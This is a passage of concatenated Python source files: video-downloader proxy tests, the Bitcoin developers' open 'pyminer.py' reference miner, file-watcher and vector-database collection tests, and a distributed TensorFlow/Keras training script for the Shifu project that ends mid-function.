self.assertEqual(r['entries'][0]['url'], 'https://127.0.0.1:%d/vid.mp4' % self.port)
def _build_proxy_handler(name):
class HTTPTestRequestHandler(compat_http_server.BaseHTTPRequestHandler):
proxy_name = name
def log_message(self, format, *args):
pass
def do_GET(self):
self.send_response(200)
self.send_header('Content-Type', 'text/plain; charset=utf-8')
self.end_headers()
self.wfile.write('{self.proxy_name}: {self.path}'.format(self=self).encode('utf-8'))
return HTTPTestRequestHandler
class TestProxy(unittest.TestCase):
def setUp(self):
self.proxy = compat_http_server.HTTPServer(
('127.0.0.1', 0), _build_proxy_handler('normal'))
self.port = http_server_port(self.proxy)
self.proxy_thread = threading.Thread(target=self.proxy.serve_forever)
self.proxy_thread.daemon = True
self.proxy_thread.start()
self.geo_proxy = compat_http_server.HTTPServer(
('127.0.0.1', 0), _build_proxy_handler('geo'))
self.geo_port = http_server_port(self.geo_proxy)
self.geo_proxy_thread = threading.Thread(target=self.geo_proxy.serve_forever)
self.geo_proxy_thread.daemon = True
self.geo_proxy_thread.start()
def test_proxy(self):
geo_proxy = f'127.0.0.1:{self.geo_port}'
ydl = YoutubeDL({
'proxy': f'127.0.0.1:{self.port}',
'geo_verification_proxy': geo_proxy,
})
url = 'http://foo.com/bar'
response = ydl.urlopen(url).read().decode('utf-8')
self.assertEqual(response, f'normal: {url}')
req = compat_urllib_request.Request(url)
req.add_header('Ytdl-request-proxy', geo_proxy)
response = ydl.urlopen(req).read().decode('utf-8')
self.assertEqual(response, f'geo: {url}')
def test_proxy_with_idn(self):
ydl = YoutubeDL({
'proxy': f'127.0.0.1:{self.port}',
})
url = 'http://中文.tw/'
response = ydl.urlopen(url).read().decode('utf-8')
# b'xn--fiq228c' is '中文'.encode('idna')
self.assertEqual(response, 'normal: http://xn--fiq228c.tw/')
if __name__ == '__main__':
unittest.main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
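# Reverse the byte order within each 32-bit word of the buffer.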
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
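# Reverse the order of the 32-bit words in the buffer; together with bufreverse this
# flips the final hash before the hex target comparison.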
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 25562
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_filewatch.py
|
import os
import time
import threading
import pytest
from doit.filewatch import FileModifyWatcher
class TestFileWatcher(object):
def testInit(self, restore_cwd, tmpdir):
dir1 = 'data3'
files = ('data/w1.txt', 'data/w2.txt')
tmpdir.mkdir('data')
for fname in files:
tmpdir.join(fname).open('a').close()
os.chdir(tmpdir.strpath)
fw = FileModifyWatcher((files[0], files[1], dir1))
# file_list contains absolute paths
assert 2 == len(fw.file_list)
assert os.path.abspath(files[0]) in fw.file_list
assert os.path.abspath(files[1]) in fw.file_list
# watch_dirs
assert 2 == len(fw.watch_dirs)
assert tmpdir.join('data') in fw.watch_dirs
assert tmpdir.join('data3') in fw.watch_dirs
# notify_dirs
assert 1 == len(fw.notify_dirs)
assert tmpdir.join('data3') in fw.notify_dirs
def testUnsuportedPlatform(self, monkeypatch):
monkeypatch.setattr(FileModifyWatcher, 'supported_platforms', ())
pytest.raises(Exception, FileModifyWatcher, [])
def testHandleEventNotSubclassed(self):
fw = FileModifyWatcher([])
pytest.raises(NotImplementedError, fw.handle_event, None)
def testLoop(self, restore_cwd, tmpdir):
files = ['data/w1.txt', 'data/w2.txt', 'data/w3.txt']
stop_file = 'data/stop'
tmpdir.mkdir('data')
for fname in files + [stop_file]:
tmpdir.join(fname).open('a').close()
os.chdir(tmpdir.strpath)
fw = FileModifyWatcher((files[0], files[1], stop_file))
events = []
should_stop = []
started = []
def handle_event(event):
events.append(event.pathname)
if event.pathname.endswith("stop"):
should_stop.append(True)
fw.handle_event = handle_event
def loop_callback(notifier):
started.append(True)
# force loop to stop
if should_stop:
raise KeyboardInterrupt
loop_thread = threading.Thread(target=fw.loop, args=(loop_callback,))
loop_thread.daemon = True
loop_thread.start()
# wait for the watcher to be ready
while not started: # pragma: no cover
time.sleep(0.01)
assert loop_thread.is_alive()
# write in watched file
fd = open(files[0], 'w')
fd.write("hi")
fd.close()
# write in non-watched file
fd = open(files[2], 'w')
fd.write("hi")
fd.close()
# write in another watched file
fd = open(files[1], 'w')
fd.write("hi")
fd.close()
# tricky to stop watching
fd = open(stop_file, 'w')
fd.write("hi")
fd.close()
time.sleep(0.1)
loop_thread.join(1)
if loop_thread.is_alive(): # pragma: no cover
# this test is very flaky so we give it one more chance...
# write on file to terminate thread
fd = open(stop_file, 'w')
fd.write("hi")
fd.close()
loop_thread.join(1)
if loop_thread.is_alive(): # pragma: no cover
raise Exception("thread not terminated")
assert os.path.abspath(files[0]) == events[0]
assert os.path.abspath(files[1]) == events[1]
|
test_drop_collection.py
|
import pdb
import pytest
import logging
import itertools
import time
from time import sleep
import threading
from multiprocessing import Process
from utils import *
from constants import *
uid = "drop_collection"
class TestDropCollection:
"""
******************************************************************
The following cases are used to test `drop_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_collection_A(self, connect, collection):
'''
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
'''
connect.drop_collection(collection)
time.sleep(2)
assert not connect.has_collection(collection)
def test_drop_collection_without_connection(self, collection, dis_connect):
'''
target: test drop collection without a connection
method: drop collection with correct params, using a disconnected instance
expected: drop raises an exception
'''
with pytest.raises(Exception) as e:
dis_connect.drop_collection(collection)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_collection_not_existed(self, connect):
'''
target: test dropping a collection that was never created
method: use a random collection name that does not exist in the db,
assert the exception raised by the drop_collection method
expected: False
'''
collection_name = gen_unique_str(uid)
try:
connect.drop_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.level(2)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_drop_collection_multithread(self, connect):
'''
target: test create and drop collection with multiple threads
method: create and drop collections concurrently from several threads
expected: collections are created, then dropped
'''
threads_num = 8
threads = []
collection_names = []
def create():
collection_name = gen_unique_str(uid)
collection_names.append(collection_name)
connect.create_collection(collection_name, default_fields)
connect.drop_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert not connect.has_collection(item)
class TestDropCollectionInvalid(object):
"""
Test has collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_drop_collection_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.parametrize("collection_name", ('', None))
def test_drop_collection_with_empty_or_None_collection_name(self, connect, collection_name):
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
|
distributed_tf_keras_to_estimator.py
|
"""Synchronous SGD
"""
# from __future__ import print_function
import os
import tensorflow as tf
import argparse
import time
import sys
import logging
import gzip
from StringIO import StringIO
import random
import numpy as np
from tensorflow.python.platform import gfile
from tensorflow.python.framework import ops
from tensorflow.python.saved_model import builder
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.saved_model import signature_def_utils
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow import keras
import json
import socket
import shutil
from tensorflow.python.client import timeline
import datetime
import math
#from threading import Thread
#import tensorboard.main as tb_main
TRAINING_MODE = "Training"
EVAL_MODE = "Validation"
HIDDEN_NODES_COUNT = 20
VALID_TRAINING_DATA_RATIO = 0.1
BUILD_MODEL_BY_CONF_ENABLE = True
REPLICAS_TO_AGGREGATE_RATIO = 1
DELIMITER = '|'
BATCH_SIZE = 128
# read from env
cluster_spec = json.loads(os.environ["CLUSTER_SPEC"])
n_pss = len(cluster_spec['ps']) # the number of parameter servers
n_workers = int(os.environ["WORKER_CNT"]) # the number of worker nodes
job_name = os.environ["JOB_NAME"]
task_index = int(os.environ["TASK_ID"])
socket_server_port = int(os.environ["SOCKET_SERVER_PORT"]) # The port of local java socket server listening, to sync worker training intermediate information with master
total_training_data_number = 40578 #int(os.environ["TOTAL_TRAINING_DATA_NUMBER"]) # total data
feature_column_nums = [int(s) for s in str(os.environ["SELECTED_COLUMN_NUMS"]).split(' ')] # selected column numbers
FEATURE_COUNT = len(feature_column_nums)
sample_weight_column_num = int(os.environ["WEIGHT_COLUMN_NUM"]) # weight column number, default is -1
target_column_num = int(os.environ["TARGET_COLUMN_NUM"]) # target column number, default is -1
tmp_model_path = os.environ["TMP_MODEL_PATH"]
final_model_path = os.environ["FINAL_MODEL_PATH"]
# This client is used for sync worker training intermediate information with master
socket_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_client.connect(("127.0.0.1", socket_server_port))
#######################################################################################################################
#### Start of TF graph definition: users may change the graph below, but keep tf.train.SyncReplicasOptimizer unchanged
#######################################################################################################################
def model(x, y_, sample_weight, model_conf):
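# Build the network (from ModelConfig when enabled, otherwise a single hidden layer),
# wrap the configured optimizer in SyncReplicasOptimizer and return
# (opt, train_step, loss, global_step, prediction).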
logging.info("worker_num:%d" % n_workers)
logging.info("total_training_data_number:%d" % total_training_data_number)
if BUILD_MODEL_BY_CONF_ENABLE and model_conf is not None:
output_digits, output_nodes = generate_from_modelconf(x, model_conf)
else:
output_digits = nn_layer(x, FEATURE_COUNT, HIDDEN_NODES_COUNT, act_op_name="hidden_layer_1")
output_nodes = HIDDEN_NODES_COUNT
logging.info("output_nodes : " + str(output_nodes))
y = nn_layer(output_digits, output_nodes, 1, act=tf.nn.sigmoid, act_op_name="shifu_output_0")
# count the number of updates
global_step = tf.get_variable('global_step', [],
initializer=tf.constant_initializer(0),
trainable=False,
dtype=tf.int32)
loss = tf.losses.mean_squared_error(predictions=y, labels=y_, weights=sample_weight)
# we suppose every worker has same batch_size
if model_conf is not None:
learning_rate = model_conf['train']['params']['LearningRate']
else:
learning_rate = 0.003
opt = tf.train.SyncReplicasOptimizer(
#tf.train.GradientDescentOptimizer(learning_rate),
#tf.train.AdamOptimizer(learning_rate=learning_rate),
get_optimizer(model_conf['train']['params']['Propagation'])(learning_rate=learning_rate),
replicas_to_aggregate=int(total_training_data_number * (1-VALID_TRAINING_DATA_RATIO) / BATCH_SIZE * REPLICAS_TO_AGGREGATE_RATIO),
total_num_replicas=int(total_training_data_number * (1-VALID_TRAINING_DATA_RATIO) / BATCH_SIZE),
name="shifu_sync_replicas")
train_step = opt.minimize(loss, global_step=global_step)
return opt, train_step, loss, global_step, y
#######################################################################################################################
#### End of TF graph definition
#######################################################################################################################
def nn_layer(input_tensor, input_dim, output_dim, l2_scale=0.01, act=tf.nn.tanh, act_op_name=None):
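# One fully connected layer: act(input * W + b) with L2 regularization on weights and biases.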
l2_reg = tf.contrib.layers.l2_regularizer(scale=l2_scale)
weights = tf.get_variable(name="weight_"+str(act_op_name),
shape=[input_dim, output_dim],
regularizer=l2_reg,
#initializer=tf.glorot_uniform_initializer())
initializer=tf.contrib.layers.xavier_initializer())
biases = tf.get_variable(name="biases_"+str(act_op_name),
shape=[output_dim],
regularizer=l2_reg,
#initializer=tf.glorot_uniform_initializer())
initializer=tf.contrib.layers.xavier_initializer())
activations = act(tf.matmul(input_tensor, weights) + biases, name=act_op_name)
return activations
def get_activation_fun(name):
if name is None:
return tf.nn.leaky_relu
name = name.lower()
if 'sigmoid' == name:
return tf.nn.sigmoid
elif 'tanh' == name:
return tf.nn.tanh
elif 'relu' == name:
return tf.nn.relu
elif 'leakyrelu' == name:
return tf.nn.leaky_relu
else:
return tf.nn.leaky_relu
def get_optimizer(name):
if 'Adam' == name:
return tf.train.AdamOptimizer
elif 'B' == name:
return tf.train.GradientDescentOptimizer
elif 'AdaGrad' == name:
return tf.train.AdagradOptimizer
else:
return tf.train.AdamOptimizer
def generate_from_modelconf(x, model_conf):
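# Stack the hidden layers described by NumHiddenLayers / NumHiddenNodes / ActivationFunc
# in ModelConfig and return the last layer together with its width.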
train_params = model_conf['train']['params']
num_hidden_layer = int(train_params['NumHiddenLayers'])
num_hidden_nodes = [int(s) for s in train_params['NumHiddenNodes']]
activation_func = [get_activation_fun(s) for s in train_params['ActivationFunc']]
if "RegularizedConstant" in train_params:
l2_scale = train_params["RegularizedConstant"]
else:
l2_scale = 0.01
global FEATURE_COUNT
logging.info("NN information: feature count: %s, hiddern layer: %s, hidden nodes: %s" % (FEATURE_COUNT, num_hidden_layer, str(num_hidden_nodes)))
# first layer
previous_layer = nn_layer(x, FEATURE_COUNT, num_hidden_nodes[0], l2_scale=l2_scale,
act=activation_func[0], act_op_name="hidden_layer_" + str(0))
for i in range(1, num_hidden_layer):
layer = nn_layer(previous_layer, num_hidden_nodes[i-1], num_hidden_nodes[i], l2_scale=l2_scale,
act=activation_func[i], act_op_name="hidden_layer_" + str(i))
previous_layer = layer
return previous_layer, num_hidden_nodes[num_hidden_layer-1]
def get_initalizer(name):
if 'gaussian' == name:
return tf.initializers.random_normal()
elif 'xavier' == name:
return tf.contrib.layers.xavier_initializer()
else:
return tf.contrib.layers.xavier_initializer()
def get_loss_func(name):
if name == None:
return tf.losses.mean_squared_error
name = name.lower()
if 'squared' == name:
return tf.losses.mean_squared_error
elif 'absolute' == name:
return tf.losses.absolute_difference
elif 'log' == name:
return tf.losses.log_loss
else:
return tf.losses.mean_squared_error
def dnn_model_fn(features, labels, mode, params):
logging.error("features:" + str(features))
shifu_context = params['shifu_context']
layers = shifu_context["layers"]
global FEATURE_COUNT
FEATURE_COUNT = shifu_context["feature_count"]
learning_rate = shifu_context["learning_rate"]
loss_func = shifu_context["loss_func"]
optimizer_name = shifu_context["optimizer"]
weight_initalizer = shifu_context["weight_initalizer"]
act_funcs = shifu_context["act_funcs"]
new_model = get_model(optimizer_name, learning_rate)
input_layer = tf.convert_to_tensor(features['input_feature'], dtype=tf.float32, name=new_model.input.name)
#input_layer = features['input_feature']
sample_weight = tf.convert_to_tensor(features['sample_weight'], dtype=tf.float32, name='shifu_input_wgt_0')
# Start define model structure
#model = [input_layer]
#current_layer = input_layer
#for i in range(len(layers)):
# node_num = layers[i]
# current_layer = tf.layers.dense(inputs=current_layer, units=node_num,
# activation=get_activation_fun(act_funcs[i]),
# kernel_initializer=get_initalizer(weight_initalizer),
# kernel_regularizer=tf.contrib.layers.l2_regularizer(scale=0.1)
# )
# model.append(current_layer)
#logits = tf.layers.dense(inputs=current_layer, units=1,
# kernel_initializer=get_initalizer(weight_initalizer),
# kernel_regularizer=tf.contrib.layers.l2_regularizer(scale=0.1)
# )
#prediction = tf.nn.sigmoid(logits, name="shifu_output_0")
prediction = new_model.output
if mode == tf.estimator.ModeKeys.PREDICT:
predictions = {
'scores': prediction
}
export_outputs = {
'predictions': tf.estimator.export.PredictOutput(predictions)
}
# In `PREDICT` mode we only need to return predictions.
return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions, export_outputs=export_outputs)
average_loss = get_loss_func(new_model.loss)(predictions=new_model.output, labels=labels, weights=features['sample_weight'])
# Pre-made estimators use the total_loss instead of the average,
# so report total_loss for compatibility.
# batch_size = tf.shape(labels)[0]
# total_loss = tf.to_float(batch_size) * average_loss
if mode == tf.estimator.ModeKeys.TRAIN:
opt = tf.train.SyncReplicasOptimizer(
#tf.train.GradientDescentOptimizer(learning_rate),
#tf.train.AdamOptimizer(learning_rate=learning_rate),
new_model.optimizer.optimizer,
replicas_to_aggregate=int(total_training_data_number * (1-VALID_TRAINING_DATA_RATIO) / BATCH_SIZE * REPLICAS_TO_AGGREGATE_RATIO),
total_num_replicas=int(total_training_data_number * (1-VALID_TRAINING_DATA_RATIO) / BATCH_SIZE),
name="shifu_sync_replicas")
train_op = opt.minimize(average_loss, global_step=tf.train.get_global_step())
# init ops
init_tokens_op = opt.get_init_tokens_op()
# initialize local step
local_init = opt.local_step_init_op
sync_replicas_hook = opt.make_session_run_hook(shifu_context["is_chief"])
if shifu_context["is_chief"]:
# initializes token queue
local_init = opt.chief_init_op
# checks if global vars are init
ready_for_local_init = opt.ready_for_local_init_op
# Initializing the variables
init_op = tf.initialize_all_variables()
logging.info("---Variables initialized---")
stop_hook = tf.train.StopAtStepHook(num_steps=shifu_context['epoch'])
chief_hooks = [sync_replicas_hook, stop_hook]
return tf.estimator.EstimatorSpec(mode=mode, loss=average_loss, train_op=train_op, training_chief_hooks=chief_hooks, training_hooks=[sync_replicas_hook])
eval_metrics = {"a-loss": tf.metrics.mean_squared_error(predictions=prediction, labels=labels,
weights=features['sample_weight'])}
if mode == tf.estimator.ModeKeys.EVAL:
return tf.estimator.EstimatorSpec(
mode=mode,
# Report sum of error for compatibility with pre-made estimators
loss=average_loss,
eval_metric_ops=eval_metrics)
class TrainAndEvalErrorHook(tf.train.SessionRunHook):
_current_epoch = 1
def __init__(self, mode_name=None, data_cnt=0, batch_size=1):
self._mode_name = mode_name
self._data_cnt = float(data_cnt)
# TODO: such steps should be recomputed
self.steps_per_epoch = math.ceil(data_cnt / batch_size)
self.total_loss = 0.0
self.current_step = 1
logging.info("")
logging.info("*** " + self._mode_name + " Hook: - Created")
logging.info("steps_per_epoch: " + str(self.steps_per_epoch))
logging.info("")
def begin(self):
self._global_step_tensor = training_util._get_or_create_global_step_read() # pylint: disable=protected-access
if self._global_step_tensor is None:
raise RuntimeError("Global step should be created to use StopAtStepHook.")
def before_run(self, run_context):
graph = run_context.session.graph
# tensor_name = 'loss_tensor_0'
# loss_tensor = graph.get_tensor_by_name(tensor_name)
loss_tensor = graph.get_collection(tf.GraphKeys.LOSSES)[0]
return tf.train.SessionRunArgs(loss_tensor, self._global_step_tensor)
def after_run(self, run_context, run_values):
logging.info("Eval: " + str(run_values));
current_loss = run_values.results[0]
self.total_loss += current_loss
global_step = run_values.results[1] + 1
if EVAL_MODE == self._mode_name:
logging.info("Eval: " +self._mode_name + " Epoch " + str(
global_step - 1) + ": Loss :" + str(self.total_loss))
elif TRAINING_MODE == self._mode_name:
logging.info("Training" + self._mode_name + " Epoch " + str(global_step-1) + ": Loss :" + str(
self.total_loss))
else:
logging.info("Invalid mode name: " + self._mode_name)
# Send intermediate result to master
message = "worker_index:{},time:{},current_epoch:{},training_loss:{},valid_loss:{},valid_time:{}\n".format(
str(task_index), "1", str(global_step), str(self.total_loss), "0", "1")
if sys.version_info < (3, 0):
socket_client.send(bytes(message))
else:
socket_client.send(bytes(message, 'utf8'))
self.total_loss = 0.0
if "Training" == self._mode_name:
type(self)._current_epoch += 1
self.current_step += 1
def move_model(export_dir):
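# Promote the newest timestamped export directory produced by export_savedmodel
# to the top level of export_dir.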
if os.path.isfile(export_dir + '/saved_model.pb'):
os.remove(export_dir + '/saved_model.pb')
shutil.rmtree(export_dir + "/variables/", ignore_errors=True)
dirs = [export_dir + "/" + d for d in os.listdir(export_dir) if os.path.isdir(export_dir + "/" + d)]
latest = sorted(dirs, key=lambda x: os.path.getctime(x), reverse=True)[0]
for f in os.listdir(latest):
cur = latest + '/' + f
if os.path.isdir(cur):
shutil.copytree(cur, export_dir + '/' + f)
else:
shutil.copy(cur, export_dir + '/' + f)
def get_model(opti_name, learning_rate):
inputs = keras.Input(shape=(FEATURE_COUNT,), name='shifu_input_0') # Returns a placeholder tensor
# A layer instance is callable on a tensor, and returns a tensor.
x = keras.layers.Dense(40, activation='relu', name='hidden_layer_1')(inputs)
predictions = keras.layers.Dense(1, activation='sigmoid', name='shifu_output_0')(x)
model = tf.keras.models.Model(inputs, predictions)
#model.compile(loss='binary_crossentropy', optimizer=get_optimizer(opti_name)(learning_rate=learning_rate), metrics=['mse'])
#model.compile(loss='binary_crossentropy', optimizer=get_optimizer(opti_name)(learning_rate=learning_rate), metrics=['mse'])
model.compile(loss='binary_crossentropy', optimizer=tf.keras.optimizers.Adam(lr=learning_rate), metrics=['mse'])
return model
def main(_):
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s', datefmt='%y-%m-%d %H:%M:%S')
logging.info("job_name:%s, task_index:%d" % (job_name, task_index))
ps_hosts = cluster_spec['ps']
worker_hosts = cluster_spec['worker']
myaddr = socket.gethostbyname(socket.getfqdn(socket.gethostname()))
logging.info("myaddr = %s" % myaddr)
chief = worker_hosts[0]
new_workers = worker_hosts[1:len(worker_hosts)]
cluster = {'chief': [chief],
'ps': ps_hosts,
'worker': worker_hosts}
new_job_name = 'chief' if (task_index == 0 and job_name == 'worker') else job_name
cluster_task_index = task_index
if job_name == 'worker' and task_index != 0: # checks if parameter server
cluster_task_index -= 1
os.environ['TF_CONFIG'] = json.dumps(
{'cluster': cluster,
'task': {'type': new_job_name, 'index': task_index}})
logging.info("TF_CONFIG = %s" % os.environ['TF_CONFIG'])
if job_name == 'ps': # checks if parameter server
server = tf.train.Server(cluster,
job_name="ps",
task_index=task_index)
server.join()
else: # it must be a worker server
is_chief = (task_index == 0) # checks if this is the chief node
logging.info("Loading data from worker index = %d" % task_index)
TIME_INTERVAL_TO_DO_VALIDATION = 3 # seconds
logging.info("Loading data from worker index = %d" % task_index)
training_data_path = os.environ["TRAINING_DATA_PATH"]
if "TRAINING_DATA_PATH" in os.environ:
logging.info("This is a normal worker..")
else:
logging.info("This is a backup worker")
# watching certain file in hdfs which contains its training data
# Read model structure info from ModelConfig
with open('./ModelConfig.json') as f:
model_conf = json.load(f)
logging.info("model" + str(model_conf))
EPOCH = int(model_conf['train']['numTrainEpochs'])
global VALID_TRAINING_DATA_RATIO
VALID_TRAINING_DATA_RATIO = model_conf['train']['validSetRate']
is_continue_train = model_conf['train']['isContinuous']
global BATCH_SIZE
if "MiniBatchs" in model_conf['train']['params']:
BATCH_SIZE = model_conf['train']['params']['MiniBatchs']
logging.info("Batch size: " + str(BATCH_SIZE) + ", VALID_TRAINING_DATA_RATIO: " + str(VALID_TRAINING_DATA_RATIO))
# import data
context = load_data(training_data_path)
if model_conf is not None:
learning_rate = model_conf['train']['params']['LearningRate']
else:
learning_rate = 0.003
shifu_context = {
"feature_column_nums": feature_column_nums, "layers": model_conf['train']['params']['NumHiddenNodes'], "batch_size": BATCH_SIZE, "feature_count": FEATURE_COUNT, "model_name": model_conf['basic']['name'], "is_chief": is_chief,
"export_dir": final_model_path, "epoch": EPOCH, "sample_weight_column_num": sample_weight_column_num,
"learning_rate": learning_rate, "loss_func": model_conf['train']['params']['Loss'], "optimizer": "adam",
"weight_initalizer": "xavier", "act_funcs": model_conf['train']['params']['ActivationFunc']}
# Train the model. TODO: epoch and step handling below
train_input_fn = tf.estimator.inputs.numpy_input_fn(
x={'input_feature': np.asarray(context['train_data'], dtype=np.float32),
'sample_weight': np.asarray(context["train_data_sample_weight"], dtype=np.float32)},
y=np.asarray(context["train_target"], dtype=np.float32),
batch_size=shifu_context["batch_size"],
num_epochs=shifu_context['epoch'],
shuffle=False)
train_spec = tf.estimator.TrainSpec(input_fn=train_input_fn,
max_steps=EPOCH,
hooks=[])
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
x={'input_feature': np.asarray(context['valid_data'], dtype=np.float32),
'sample_weight': np.asarray(context["valid_data_sample_weight"], dtype=np.float32)},
y=np.asarray(context["valid_target"], dtype=np.float32),
batch_size=len(context["valid_target"]),
num_epochs=shifu_context['epoch'],
shuffle=False)
eval_spec = tf.estimator.EvalSpec(input_fn=eval_input_fn,
throttle_secs=TIME_INTERVAL_TO_DO_VALIDATION,
hooks=[TrainAndEvalErrorHook(EVAL_MODE, len(context["valid_target"]), len(context["valid_target"]))])
run_config = tf.estimator.RunConfig(tf_random_seed=19830610,
model_dir=tmp_model_path,
save_checkpoints_steps=10,
log_step_count_steps=1)
#train_distribute=tf.contrib.distribute.ParameterServerStrategy)
#dnn = tf.estimator.Estimator(model_fn=dnn_model_fn, params={'shifu_context': shifu_context}, config=run_config)
new_model = get_model(model_conf['train']['params']['Propagation'], learning_rate)
keras.backend.set_learning_phase(1)
keras.backend.manual_variable_initialization(True)
#shifu_context['keras_model'] = new_model
#dnn = tf.estimator.Estimator(model_fn=dnn_model_fn, params={'shifu_context': shifu_context}, config=run_config)
